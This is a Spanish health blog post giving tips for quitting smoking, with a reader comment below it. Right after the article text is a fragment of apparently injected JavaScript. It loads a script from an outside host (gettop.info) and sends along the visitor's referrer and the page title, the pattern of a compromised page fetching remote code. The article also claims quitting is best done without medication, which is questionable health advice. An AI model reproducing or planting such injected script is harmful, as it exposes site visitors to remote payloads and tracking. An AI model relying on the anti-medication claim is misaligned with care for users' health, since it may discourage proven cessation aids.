Salud y belleza » Alimentación, Bienestar, Medicina

¿Cómo dejar de fumar?

1 Comentario

Apagar el cigarrilloQuienes fuman saben lo difícil que es a veces dejarlo, es como una dependencia, un vicio que te apetece y del que no te puedes desprender. Pero también saben lo perjudicial que es, aunque no quieran pensar en ello y le den la vuelta a paquete de cigarrillos cuando ven las fotografías tan repulsivas que ponen a menudo. El tabaco mata y provoca numerosas enfermedades, en cáncer es la más peligrosa.

Por ello vamos a intentar ofrecerte unas técnicas básicas para que intentes dejarlo y vayas tomando la iniciativa, porque a lo mejor cuando te obliguen los médicos a dejarlo ya sea demasiado tarde.

Decisión: El primer paso es tomar la decisión de dejar de fumar. Buscar técnicas es un gran paso, pero la concienciación y su posterior puesta en marcha es la base para que decidan dejar de fumar.

Tirar los cigarrillosFuerza de voluntad: una vez tomada la decisión debe confiar en sí mismo, pensar que será capaz de hacerlo. Puede que piense que se sentirá extraño sin un cigarrillo en la boca, cierto, la vida será diferente, pero porque será mejor y posiblemente más duradera.

Precauciones: dejar de fumar no es fácil, pero tampoco hace falta que nos ayuden las medicinas ni las drogas a conseguirlo. Empezamos sin ayuda y los dejaremos sin ayuda, porque al fin y al cabo sigue habiendo dependencia si se sigue medicando. Tampoco debe sucumbir a los antojos que le entrarán después de fumar, intente estar distraído o concentrarse en otra cosa. Y nunca piense en su vida pasado con el tabaco, sino en el futuro sin él.

Preparar un planing, plantearse una rutina: muchas veces cuando hacemos los propósitos de fin de año se piensa en hacer deporte, aprender inglés… y dejar de fumar. Están muy bien estos propósitos con la emoción del momento, pero hay que ser realistas y es mejor plantearse estas decisiones tranquilamente, con determinación y haciendo, por ejemplo, una lista con los contras de fumar para pensar en ellos cuando aparezcan las ganas. No es fácil, pero en  las horas en las que solías fumar deberías hacerte una rutina, una lista de cosas que puedes hacer en lugar de fumar para así centrarte en esas tareas o acciones.

Hacer ejercicio

Cambio de algunos hábitos: lo primero que hay que hacer es tirar todos los cigarrillos y jamás comprar más tabaco, por ninguna razón. Así, en el momento en que tengas un instante de debilidad no podrás coger ninguno y te preguntarás si merece la pena comprar un paquete y volver a fumar solo porque quieras un cigarro. También es preferible alejarse de las personas fumadoras mientras están fumando, por lo menos durante el primer periodo. Después de un tiempo te acercarás a ellas y en lugar de sentir tentación sentirás asco. También es aconsejable descansar mucho y beber mucho agua.

Busca algún hobby o alguna distracción: a menudo el deseo de volver a fumar es muy fuerte, por eso si se quiere sacar la energía o despejarse es mejor buscar actividades como el deporte. Al principio es mejor empezar con actividades que supongan ejercicio para soltar adrenalina, más tarde se podrá empezar con actividades o hobbys más tranquilos: montar maquetas, hacer puzzles, pintar, cuidar el jardín… son solo algunas actividades que nos conciencien de que en ese rato que nos pasábamos fumando un cigarrillo se ha perdido mucho tiempo y mucha vida que se puede recuperar.

FelicidadA la larga te darás cuenta de todo lo que ganas, ya que cada vez que pasa más tiempo desde que has dejado de fumar, recuperas un poco de tu salud y de tu vida.

Si estos métodos no son eficaces o no tienes fuerza de voluntar para dejarlo solo, lo mejor es que acudas a tu farmacia y ésta re recomiende algún chicle o parche de nicotina, que realmente lo que hace es aliviarte el estrés sicológico que pueda acarrear.

Lo mejor es estar siempre positivo, nunca negativo.

¿Has intentado dejar alguna vez de fumar? ¿Lo has conseguido? Cuéntanoslo.if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • auxi said:

    Un articulo muy currado y directo.

    Antes de nada creo que el problema fundamental radica en la educacion. Educacion que igual a las 30 añeras como yo no nos dieron o igual no fue de forma concisa. La educacion ante el tabaco y ante lo que supone el dejar de fumar es fundamental. En mi generacion y no hace tantos años, la gente fumaba por aparentar algo que no eras, por lo menos en mi caso fue asi.
    Ahora me estoy planteando el dejar de fumar, y raro es el metodo que no es super caro o con lleva un desembolso de dinero x para conseguir resultados.
    De todas formas estoy totalmente a favor de que se informe a todos los menores de edad de los problemas y enfermedades que lleva el tabaco y por supuesto de todo el esfuerzo y sacrificio que cuesta el quitarse del puñetero tabaco.

    Espero escribiros pronto y deciros que lo he conseguido.

    Saludos

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.